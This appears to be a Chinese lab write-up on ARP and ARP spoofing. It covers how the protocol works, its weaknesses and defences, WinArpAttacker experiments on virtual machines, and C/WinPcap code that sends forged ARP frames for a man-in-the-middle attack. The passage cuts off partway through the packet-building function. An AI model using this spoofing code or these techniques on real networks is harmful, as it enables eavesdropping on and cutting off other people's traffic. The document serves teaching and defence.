I"<h3 id="一arp协议简介">一、ARP协议简介</h3>

<p>在介绍<a href="https://baike.baidu.com/item/ARP/609343">arp协议</a>之前，我们先来了解一下<a href="https://baike.baidu.com/item/IP/224599?fromtitle=IP%E5%9C%B0%E5%9D%80&amp;fromid=150859">IP地址</a>和<a href="https://baike.baidu.com/item/MAC%E5%9C%B0%E5%9D%80">MAC地址</a>：</p>

<ul>
  <li>ip地址(ipv4–32位，ipv6-128位)
    <ul>
      <li>IP地址<strong>（Internet Protocol Address）</strong>，全称互联网协议地址，意思是分配给用户上网使用的网际协议的设备的数字标签，分为IPv4与IPv6两大类，但是也有其他不常用的小分类。</li>
      <li>位于<a href="https://baike.baidu.com/item/OSI模型">OSI模型</a>中第三层网络层</li>
      <li>逻辑层面的地址，唯一标识一个网络位置</li>
    </ul>
  </li>
  <li>mac地址(48位)
    <ul>
      <li>MAC地址（<strong>Media Access Control Address）</strong>，直译为媒体存取控制位址，也称为物理地址（Physical Address）</li>
      <li>位于<a href="https://baike.baidu.com/item/OSI模型">OSI模型</a>中第二层数据链路层</li>
      <li>物理层面的地址，唯一标识一个网络设备</li>
    </ul>
  </li>
</ul>

<p>由于IP地址（IPv4，32位，逻辑地址）和mac地址（48位，物理地址）格式不同、性质不同，它们之间不存在简单的映射关系；并且随着主机的加入和退出，IP地址和硬件地址的映射还会发生变化。</p>

<p>这个时候呢人们就想到了一个办法：在主机ARP高速缓冲中，存放一个从IP地址到硬件地址的映射表，这个映射表会经常动态更新 （新增或超时删除），这就是<strong>ARP（Address Resolution Protocol）地址解析协议</strong></p>

<h3 id="二arp协议工作过程">二、ARP协议工作过程</h3>

<ol>
  <li>
    <p>主机A想和主机B通信，就先在主机A的ARP高速缓冲中，查看有无主机B的IP地址。如果有，就查出主机B对应的MAC地址。如果没有，主机A会发送一个ARP请求广播包，此包内包含着主机B的IP地址。本局域网上的所有主机都将收到这个ARP请求。</p>
  </li>
  <li>
    <p>除了主机B，其余主机都不理睬这个ARP请求。主机B在ARP请求分组中看到自己的IP地址，就向主机A发送包含自己硬件地址的ARP响应分组。同时为了提高效率，主机B还把主机A的IP地址和MAC地址的映射关系保存到自己的高速缓存中。</p>
  </li>
  <li>
    <p>主机A收到主机B的ARP响应分组后，就在其ARP高速缓存中写入主机B的IP地址到硬件地址的映射。这样，主机A、B都有了彼此的IP和硬件地址，双方可以通信了！</p>
  </li>
</ol>

<h3 id="三arp协议的缺陷安全问题">三、ARP协议的缺陷（安全问题）</h3>

<ul>
  <li>ARP协议是建立在<strong>信任</strong>局域网内所有结点的基础上的，这使得它高效但却不安全。</li>
  <li>ARP协议是<strong>无状态</strong>的协议，不会检查自己是否发过请求包，只要收到目标MAC是自己的ARP响应数据包或ARP广播包，都会接受并缓存。</li>
  <li>ARP协议<strong>没有认证机制</strong>，只要接收到的协议包是有效的，主机就无条件地根据协议包的内容刷新本机ARP缓存，并不检查该协议包的合法性。</li>
  <li><u>因此攻击者可以随时发送虚假ARP包更新被攻击主机上的ARP缓存，进行地址欺骗或拒绝服务攻击。</u></li>
</ul>

<h3 id="四arp相关协议及应用">四、ARP相关协议及应用</h3>

<h5 id="1-rarp反向arp-">1. RARP（反向ARP ）</h5>

<ul>
  <li>局域网的物理机器从网关服务器的 ARP 表或者缓存上根据MAC地址请求其 IP 地址，广泛用于获取无盘工作站的IP地址。</li>
</ul>

<h5 id="2-代理arp">2. 代理ARP</h5>

<ul>
  <li>通过使用一个主机（通常为router），来作为指定的设备对另 一设备的ARP请求作出应答。</li>
  <li>例如，主机PC1（192.168.20.66/24）需要向主机PC2（192.168.20.20/24）发送报文，因为主机PC1不知道<a href="https://baike.baidu.com/item/子网">子网</a>的存在且和目标主机PC2在同一主网络网段，所以主机PC1将发送ARP协议请求广播报文来请求192.168.20.20的MAC地址。这时，路由器将识别出报文的目标地址属于另一个子网，因此向请求主机回复<strong>自己</strong>的硬件地址（0004.dd9e.cca0）。之后，PC1将发往PC2的数据包都发往MAC地址0004.dd9e.cca0（路由器的接口E0/0），由路由器将数据包转发到目标主机PC2。（接下来路由器将为PC2做同样的代理发送数据包的工作）。</li>
</ul>

<h5 id="3-无故arp-gratuitous-arpgarp">3. 无故ARP （Gratuitous ARP，GARP）</h5>

<ul>
  <li>主机有时会使用自己的IP地址作为目标地址发送ARP请求。主要用来检测IP的地址是否有冲突。</li>
</ul>

<h5 id="4-arp欺骗的正当用途">4. ARP欺骗的正当用途</h5>

<ol>
  <li>在一个需要登录的网上中，让未登录的计算机将其浏览网页强制转向到登录页面，以便登录后才可使用网上。</li>
  <li>另外有些设有备援机制的网上设备或服务器，亦需要利用ARP欺骗以在设备出现故障时将讯务导到备用的设备上。</li>
</ol>

<h3 id="五arp欺骗攻击原理">五、ARP欺骗攻击原理</h3>

<h4 id="1-mac-flooding">1. MAC flooding</h4>

<ol>
  <li>
    <h5 id="原理">原理</h5>

    <ul>
      <li>攻击者能让目标网络中的交换机不断泛洪大量不同源MAC地址的数据包，导致交换机内存不足以存放正确的MAC地址和物理端口号相对应的关系表。</li>
    </ul>
  </li>
  <li>
    <p><strong>效果</strong></p>

    <ul>
      <li>如果攻击成功，交换机会降级为集线器（所有新进入交换机的数据包会不经过交换机处理直接广播到所有的端口）。攻击者和目标连接在同一个集线器时，攻击者可设置网卡为混杂模 式，窃听所有数据帧。</li>
    </ul>
  </li>
  <li>
    <p><strong>过程</strong></p>

    <ul>
      <li>向目标交换机发送大量不同源MAC地址的数据包，使得交换机内存不足以存放正确的MAC地址和物理端口号的映射关系。交换机因此降级到集线器模式， 数据包被广播到所有的端口， 攻击者从而能够嗅探网络内信息。</li>
    </ul>
  </li>
</ol>

<h4 id="2-中间人攻击mim-man-in-the-middle">2. 中间人攻击（MIM, Man In the Middle）</h4>

<ol>
  <li>
    <p><strong>原理</strong></p>

    <p>中间人C接收并转发A和B的消息达到嗅探的目的</p>
  </li>
  <li>
    <p><strong>效果</strong></p>

    <p>攻击成功后， 主机A发送给主机B的数据包被转发给主机C，主机B发送给主机A的数据包也被转发给主机C，于是A、B之间的数据均被C嗅探。攻击者C会转发重定向到自己的数据包到正确位置，因此A和B没有察觉到嗅探的存在。</p>
  </li>
  <li>
    <p><strong>过程</strong></p>

    <p>攻击者C向目标发送虚假应答包， 告诉主机A“主机B的MAC地址是MacC”，告诉主机B“主机A的MAC地址 是MacC”。</p>

    <p>成功后， 主机A发送给主机B的数据包被 转发给主机C，
主机B发送给主机A的数据包也被 转发给主机C，
于是A、B之间的数据均被C嗅探。
攻击者C会转发重定向到自己的数据包到正确位置，因此A和B不会察觉到嗅探的存在。</p>
  </li>
</ol>

<h3 id="六arp欺骗防范技术">六、ARP欺骗防范技术</h3>

<h4 id="1-静态arp绑定">1. 静态ARP绑定</h4>

<p>最理想的防制方法是网上内的每台计算机的ARP一律改用静态的方式，不过这在大型的网上是不可行的，因为需要经常更新每台计算机的ARP表。</p>

<h4 id="2-arp防护软件">2. ARP防护软件</h4>

<p>有一些软件可监听网上上的ARP回应，若侦测出有不正常变动时可发送邮箱通知管理者。例如UNIX平台的<a href="https://baike.baidu.com/item/Arpwatch">Arpwatch</a>以及Windows上的XArp v2或一些网上设备的Dynamic ARP inspection功能。</p>

<h4 id="3-arp防护功能的路由器">3. ARP防护功能的路由器</h4>

<p>有些网络设备可借由<a href="https://baike.baidu.com/item/DHCP">DHCP</a>保留网络上各计算机的MAC地址，在伪造的ARP数据包发出时即可侦测到。此方式已在一些厂牌的网络设备产品所支持。</p>

<h3 id="七arp欺骗攻击工具实验">七、ARP欺骗攻击工具实验</h3>

<h4 id="1-实验环境">1. 实验环境</h4>

<p><img src="1569590966295.png" alt="1569590966295" /></p>

<table>
  <thead>
    <tr>
      <th>主机</th>
      <th>网关</th>
      <th>ip</th>
      <th>mac</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>虚拟机1</td>
      <td>192.168.150.2</td>
      <td>192.168.150.128</td>
      <td>00:0C:29:D3:8D:F4</td>
    </tr>
    <tr>
      <td>虚拟机2</td>
      <td>192.168.150.2</td>
      <td>192.168.150.129</td>
      <td>00:0C:29:45:7A:1A</td>
    </tr>
    <tr>
      <td>虚拟机3</td>
      <td>192.168.150.2</td>
      <td>192.168.150.130</td>
      <td>00:0C:29:16:B3:16</td>
    </tr>
    <tr>
      <td>网关</td>
      <td> </td>
      <td>192.168.150.2</td>
      <td>00:50:56:E9:A3:2E</td>
    </tr>
  </tbody>
</table>

<p>以上的虚拟机操作系统是Windows7，已经关闭了防火墙使得虚拟机两两可以相互<strong>ping</strong>通。</p>

<p>下面的实验都是基于此环境。</p>

<h4 id="2-禁止上网攻击">2. 禁止上网攻击</h4>

<ul>
  <li>使用<strong>虚拟机1</strong> 攻击 <strong>虚拟机2</strong></li>
</ul>

<p>首先打开winarpattacker并扫描局域网，如图：</p>

<p><img src="1569591000539.png" alt="1569591000539" /></p>

<p>128、129、130分别是三台虚拟机1、2、3的ip；2是三台虚拟机的网关；254是三台虚拟机的DHCP服务器；1是啥呢我不知道。</p>

<p>选定目标主机（192.168.150.129），选定攻击方式（禁止上网）</p>

<p>在wireshark上使用arp过滤查看arp数据包信息：</p>

<p><img src="1569591722643.png" alt="1569591722643" /></p>

<p><img src="1569591777985.png" alt="1569591777985" /></p>

<p>从捕获的数据包来看，整个攻击过程是以下的流程：</p>

<ol>
  <li>
    <p>攻击者伪造网关的ip（192.168.150.2）和<strong>特定的</strong>mac地址（01-01-01-01-01-01）向受害者发送arp请求，相当于告诉受害者网关的mac地址是01-01-01-01-01-01</p>
  </li>
  <li>
    <p>攻击者伪造受害者的ip(192.168.150.129)和<strong>特定的</strong>mac地址（01-01-01-01-01-01）向网关（192.168.150.2）发送arp请求，相当于告诉网关受害者的mac地址是01-01-01-01-01-01</p>
  </li>
  <li>
    <p>此时受害者的arp列表中网关的mac地址已经被更改了：</p>

    <p><img src="1569592062197.png" alt="1569592062197" /></p>
  </li>
  <li>
    <p>攻击者使用特定的mac地址（01-01-01-01-01-01）混淆了网关和受害者，使得网关和受害者互相以为对方的mac都是01-01-01-01-01-01，所以受害者无法再和网关通信，从而达到了禁止上网的攻击效果。</p>
  </li>
</ol>

<h4 id="3-ip冲突攻击">3. IP冲突攻击</h4>

<p><strong>同样是虚拟机1攻击虚拟机2</strong></p>

<p>抓包发现ip冲突攻击就是伪造受害者的ip和一个与受害者真实mac不同的mac向受害者发送arp请求，让受害者以为是自己发出去检测是否有机器和自己ip相同的，如果有机器回复，说明自己的ip已经有人占有了。所以就会有ip冲突的效果。</p>

<p>不间断ip冲突就是不停的发送这条arp请求</p>

<p>定时ip冲突就是每隔一段时间发送一次该arp请求。</p>

<p><img src="1569481855840-1569670687737.png" alt="1569481855840" /></p>

<p>但是该攻击只有在受害者需要重新申请ip的时候才会起作用，比如重启，下面是受害者重启后的效果，可以看到受害者的ip已经从192.168.99.128变为192.168.99.130了。</p>

<p>受害者首先肯定是先试了以下128的，但是会发现有人在占用，所以只能使用130了。</p>

<h4 id="4-监听受害者与网关通信">4. 监听受害者与网关通信</h4>

<p>虚拟机1的ip从128变成了130，现在回不来了，所以从现在开始虚拟机1的ip就是192.168.99.130了。</p>

<p>开始攻击</p>

<ol>
  <li>
    <p>攻击者伪造arp包告诉网关130的mac地址是攻击者的mac地址，这样网关发给受害者的消息就不再发给受害者而是发给攻击者了</p>

    <p><img src="1569484464625.png" alt="1569484464625" /></p>
  </li>
  <li>
    <p>攻击者伪造arp包告诉130网关的mac地址是攻击者的mac地址，这样130发给网关的消息就不再发给网关而是发给攻击者了</p>

    <p><img src="1569484491896.png" alt="1569484491896" /></p>
  </li>
  <li>
    <p>为了能正常工作，攻击者还要和网关建立正常的arp映射关系：</p>

    <p><img src="1569484385863.png" alt="1569484385863" /></p>
  </li>
  <li>
    <p>然后就可以愉快的监听了</p>

    <p><img src="1569484605167.png" alt="1569484605167" /></p>
  </li>
</ol>

<h4 id="5-监听两个用户之间的通讯">5. 监听两个用户之间的通讯</h4>

<p>使用主机1监听主机2和主机3</p>

<p><img src="1569671774608.png" alt="1569671774608" /></p>

<p>选定要监听的两个主机并勾选监听主机通讯：</p>

<p><img src="1569671872471.png" alt="1569671872471" /></p>

<p>攻击者抓到的arp 包：</p>

<p><img src="1569671894050.png" alt="1569671894050" /></p>

<p>可以看到虚拟机1首先使用虚拟机3的ip和自己的mac地址向虚拟机2发送了arp请求包，让虚拟机2以为虚拟机3的mac地址是虚拟机1的mac地址。</p>

<p><img src="1569672067692.png" alt="1569672067692" /></p>

<p><img src="1569672320563.png" alt="1569672320563" /></p>

<p>然后虚拟机1又对虚拟机3做了同样的处理，使得虚拟机3以为虚拟机2的mac地址是虚拟机1的mac地址：</p>

<p><img src="1569672483106.png" alt="1569672483106" /></p>

<p>这样虚拟机2与虚拟机3的通讯信息都会发送到虚拟机1.</p>

<p>这样还不够，虚拟机1还要分别与虚拟机2和虚拟机3建立正常的arp映射关系表，这样虚拟机才能把收到的监听信息发送到它应该的接收者那里去，从而不让受害者察觉自己正在被监听。</p>

<p><img src="1569672784259.png" alt="1569672784259" /></p>

<p>攻击成功，接下来查看虚拟机2和3的状态。</p>

<p>虚拟机2的状态：</p>

<p><img src="1569672956127.png" alt="" /></p>

<p>虚拟机3的状态：</p>

<p><img src="1569673128415.png" alt="1569673128415" /></p>

<p>可以看到虚拟机2和3的arp列表都被更新了他们把对方的ip都指向了攻击者（00:0C:29:D3:8D:F4）</p>

<p>用虚拟机2ping一下虚拟机3：</p>

<p><img src="1569674898793.png" alt="1569674898793" /></p>

<p>虚拟机2抓到的通讯包：</p>

<p><img src="1569675022318.png" alt="1569675022318" /></p>

<p><img src="1569675041325.png" alt="1569675041325" /></p>

<p>虚拟机2抓包发现虚拟机2是与虚拟机3的ip在通讯，但是mac地址却是虚拟机1的！整个过程完全没有虚拟机3的参与，尽管虚拟机2的目标是虚拟机3.</p>

<p>虚拟机1抓到的监听的包：</p>

<p><img src="1569675187265.png" alt="1569675187265" /></p>

<p><img src="1569675244973.png" alt="1569675244973" /></p>

<p><img src="1569675261522.png" alt="1569675261522" /></p>

<p><img src="1569675274801.png" alt="1569675274801" /></p>

<p><img src="1569675308632.png" alt="1569675308632" /></p>

<p><img src="1569675320666.png" alt="1569675320666" /></p>

<p><img src="1569675338967.png" alt="1569675338967" /></p>

<p><img src="1569675349654.png" alt="1569675349654" /></p>

<p>虚拟机1首先收到虚拟机2发送给虚拟机3的包并转发给虚拟机3，然后收到虚拟机3的回复并转发给虚拟机2.如此是一个icmp包的请求和应答。</p>

<h3 id="八arp欺骗攻击编程实验">八、ARP欺骗攻击编程实验</h3>

<h4 id="1-方案设计">1. 方案设计</h4>

<p>作为第三方发送伪造arp包更改任意两个受害者的arp列表从而实现中间人攻击。假设我们是A，两个受害者分别是B、C：</p>

<ol>
  <li>A作为攻击者使用自己的mac地址和B的ip地址向C发送arp包，C收到包会立即更改自己的arp表，使B的ip地址指向的mac地址为攻击者A的mac地址；</li>
  <li>A作为攻击者使用自己的mac地址和C的ip地址向B发送arp包，B收到包会立即更改自己的arp表，使C的ip地址指向的mac地址为攻击者A的mac地址；</li>
  <li>为了不让受害者B,C改正自己的arp表，A不断地重复以上过程。</li>
</ol>

<h4 id="2-环境配置">2. 环境配置</h4>

<p>直接使用vs打开Examples-pcap文件夹中的MakeaAll.sln的解决方案：</p>

<p><img src="1569923329545.png" alt="1569923329545" /></p>

<p><img src="1569923323672.png" alt="1569923323672" /></p>

<p>打开后发现解决方案中又十个项目，因为我们的任务是发送arp包实现中间人攻击，因此我们只需要用到其中的sendpack项目：</p>

<p><img src="1569923478014.png" alt="1569923478014" /></p>

<p>选中该项目右键设置该项目为启动项目，之后启动解决方案就是运行sendpack项目了。现在就可以编辑sendpack.c代码了！</p>

<h4 id="3-开始编码">3. 开始编码</h4>

<ol>
  <li>
    <p>程序变量</p>

    <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>	<span class="n">pcap_if_t</span><span class="o">*</span> <span class="n">alldevs</span><span class="p">;</span>			<span class="c1">//网卡列表</span>
	<span class="n">pcap_if_t</span><span class="o">*</span> <span class="n">d</span><span class="p">;</span>				<span class="c1">//选中的网卡</span>
	<span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>					<span class="c1">//全局计数变量</span>
	<span class="kt">int</span> <span class="n">inum</span><span class="p">;</span>					<span class="c1">//定位选中的网卡</span>
	<span class="n">u_char</span><span class="o">*</span> <span class="n">packet1</span><span class="p">[</span><span class="mi">100</span><span class="p">];</span>		<span class="c1">//arp帧包1</span>
	<span class="n">u_char</span><span class="o">*</span> <span class="n">packet2</span><span class="p">[</span><span class="mi">100</span><span class="p">];</span>		<span class="c1">//arp帧包2</span>
   
	<span class="n">pcap_t</span> <span class="o">*</span><span class="n">fp</span><span class="p">;</span>					<span class="c1">//启用网卡后的句柄</span>
	<span class="kt">char</span> <span class="n">errbuf</span><span class="p">[</span><span class="n">PCAP_ERRBUF_SIZE</span><span class="p">];</span>		<span class="c1">//错误缓冲区</span>
	<span class="kt">int</span> <span class="n">flood</span><span class="p">;</span>							<span class="c1">//发送包的数量</span>
   
	<span class="kt">int</span> <span class="n">self_mac</span><span class="p">[</span><span class="mi">6</span><span class="p">];</span>		<span class="c1">//攻击者自己的mac地址</span>
	<span class="kt">int</span> <span class="n">victim1_ip</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span>		<span class="c1">//受害者1的ip</span>
	<span class="kt">int</span> <span class="n">victim1_mac</span><span class="p">[</span><span class="mi">6</span><span class="p">];</span>		<span class="c1">//受害者1的mac地址</span>
	<span class="kt">int</span> <span class="n">victim2_ip</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span>		<span class="c1">//受害者2的ip</span>
	<span class="kt">int</span> <span class="n">victim2_mac</span><span class="p">[</span><span class="mi">6</span><span class="p">];</span>		<span class="c1">//受害者2的mac地址</span>
   
</code></pre></div>    </div>
  </li>
  <li>
    <p>检索网卡</p>

    <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>	<span class="cm">/* 检索设备列表 */</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">pcap_findalldevs</span><span class="p">(</span><span class="o">&amp;</span><span class="n">alldevs</span><span class="p">,</span> <span class="n">errbuf</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
	<span class="p">{</span>
		<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Error in pcap_findalldevs: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">errbuf</span><span class="p">);</span>
		<span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
	<span class="p">}</span>
</code></pre></div>    </div>
  </li>
  <li>
    <p>选中并使用网卡</p>

    <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>	<span class="cm">/* 打开用户选中的网卡适配器 */</span>
	<span class="k">if</span> <span class="p">((</span><span class="n">fp</span> <span class="o">=</span> <span class="n">pcap_open_live</span><span class="p">(</span><span class="n">d</span><span class="o">-&gt;</span><span class="n">name</span><span class="p">,</span>		<span class="c1">// name of the device</span>
							 <span class="mi">65536</span><span class="p">,</span>			<span class="c1">// portion of the packet to capture. It doesn't matter in this case </span>
							 <span class="mi">1</span><span class="p">,</span>				<span class="c1">// promiscuous mode (nonzero means promiscuous)</span>
							 <span class="mi">1000</span><span class="p">,</span>			<span class="c1">// read timeout</span>
							 <span class="n">errbuf</span>			<span class="c1">// error buffer</span>
							 <span class="p">))</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
	<span class="p">{</span>
		<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="s">"</span><span class="se">\n</span><span class="s">Unable to open the adapter. %s is not supported by WinPcap</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
		<span class="k">return</span> <span class="mi">2</span><span class="p">;</span>
	<span class="p">}</span>
</code></pre></div>    </div>
  </li>
  <li>
    <p>用户输入参数封装arp包</p>

    <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>	<span class="n">printf</span><span class="p">(</span><span class="s">"please input self_mac address like aa-aa-aa-aa-aa-aa: "</span><span class="p">);</span>
	<span class="n">scanf_s</span><span class="p">(</span><span class="s">"%x-%x-%x-%x-%x-%x"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">self_mac</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">self_mac</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">self_mac</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">self_mac</span><span class="p">[</span><span class="mi">3</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">self_mac</span><span class="p">[</span><span class="mi">4</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">self_mac</span><span class="p">[</span><span class="mi">5</span><span class="p">]);</span>
   
	<span class="n">printf</span><span class="p">(</span><span class="s">"please input victim1's ip like 1.1.1.1: "</span><span class="p">);</span>
	<span class="n">scanf_s</span><span class="p">(</span><span class="s">"%d.%d.%d.%d"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">victim1_ip</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim1_ip</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim1_ip</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim1_ip</span><span class="p">[</span><span class="mi">3</span><span class="p">]);</span>
   
	<span class="n">printf</span><span class="p">(</span><span class="s">"please input victim1's mac like aa-aa-aa-aa-aa-aa: "</span><span class="p">);</span>
	<span class="n">scanf_s</span><span class="p">(</span><span class="s">"%x-%x-%x-%x-%x-%x"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">victim1_mac</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim1_mac</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim1_mac</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim1_mac</span><span class="p">[</span><span class="mi">3</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim1_mac</span><span class="p">[</span><span class="mi">4</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim1_mac</span><span class="p">[</span><span class="mi">5</span><span class="p">]);</span>
   
	<span class="n">printf</span><span class="p">(</span><span class="s">"please input victim2's ip like 1.1.1.1: "</span><span class="p">);</span>
	<span class="n">scanf_s</span><span class="p">(</span><span class="s">"%d.%d.%d.%d"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">victim2_ip</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim2_ip</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim2_ip</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim2_ip</span><span class="p">[</span><span class="mi">3</span><span class="p">]);</span>
   
	<span class="n">printf</span><span class="p">(</span><span class="s">"please input victim2's mac like aa-aa-aa-aa-aa-aa: "</span><span class="p">);</span>
	<span class="n">scanf_s</span><span class="p">(</span><span class="s">"%x-%x-%x-%x-%x-%x"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">victim2_mac</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim2_mac</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim2_mac</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim2_mac</span><span class="p">[</span><span class="mi">3</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim2_mac</span><span class="p">[</span><span class="mi">4</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim2_mac</span><span class="p">[</span><span class="mi">5</span><span class="p">]);</span>
   
	<span class="n">pktbuild</span><span class="p">(</span><span class="o">&amp;</span><span class="n">packet1</span><span class="p">,</span> <span class="n">self_mac</span><span class="p">,</span> <span class="n">victim1_ip</span><span class="p">,</span> <span class="n">victim2_mac</span><span class="p">,</span> <span class="n">victim2_ip</span><span class="p">);</span>				<span class="c1">//build a arp-packet at &amp;packet</span>
	<span class="n">pktbuild</span><span class="p">(</span><span class="o">&amp;</span><span class="n">packet2</span><span class="p">,</span> <span class="n">self_mac</span><span class="p">,</span> <span class="n">victim2_ip</span><span class="p">,</span> <span class="n">victim1_mac</span><span class="p">,</span> <span class="n">victim1_ip</span><span class="p">);</span>				<span class="c1">//build a arp-packet at &amp;packet</span>
   
	<span class="n">printf</span><span class="p">(</span><span class="s">"please input the flood(num of packet to send):"</span><span class="p">);</span>
	<span class="n">scanf_s</span><span class="p">(</span><span class="s">"%d"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">flood</span><span class="p">);</span>
</code></pre></div>    </div>
  </li>
  <li>
    <p>循环发包</p>

    <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>	/* Send down the packet */
	for (int i = 0; i &lt; flood; i++)
	{
		if (pcap_sendpacket(fp,	// Adapter
			packet1,				// buffer with the packet
			100				// size
			) != 0)
		{
			fprintf(stderr, "\nError sending the packet: %s\n", pcap_geterr(fp));
			return 3;
		}
   
		if (pcap_sendpacket(fp,	// Adapter
			packet2,				// buffer with the packet
			100				// size
		) != 0)
		{
			fprintf(stderr, "\nError sending the packet: %s\n", pcap_geterr(fp));
			return 3;
		}
   
		Sleep(100);			//发送间隔时间100ms
	}
</code></pre></div>    </div>
  </li>
  <li>
    <p>封包函数</p>

    <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* build arp-packet */</span>
<span class="kt">void</span> <span class="nf">pktbuild</span><span class="p">(</span><span class="n">u_char</span> <span class="o">*</span><span class="n">packet</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="n">smac</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="n">sip</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="n">dmac</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="n">dip</span><span class="p">)</span>
<span class="p">{</span>
	<span class="cm">/* 目的以太网地址 */</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">3</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">5</span><span class="p">];</span>
   
	<span class="cm">/* 源以太网地址 */</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">6</span><span class="p">]</span> <span class="o">=</span>  <span class="n">smac</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">7</span><span class="p">]</span> <span class="o">=</span>  <span class="n">smac</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">8</span><span class="p">]</span> <span class="o">=</span>  <span class="n">smac</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">9</span><span class="p">]</span> <span class="o">=</span>  <span class="n">smac</span><span class="p">[</span><span class="mi">3</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">10</span><span class="p">]</span> <span class="o">=</span> <span class="n">smac</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">11</span><span class="p">]</span> <span class="o">=</span> <span class="n">smac</span><span class="p">[</span><span class="mi">5</span><span class="p">];</span>
   
	<span class="cm">/* set arp */</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">12</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x08</span><span class="p">;</span>	<span class="c1">//0x0806表示该帧封装ARP包</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">13</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x06</span><span class="p">;</span>
   
	<span class="n">packet</span><span class="p">[</span><span class="mi">14</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x00</span><span class="p">;</span>	<span class="c1">//硬件类型，值为1表示以太网</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">15</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x01</span><span class="p">;</span>
   
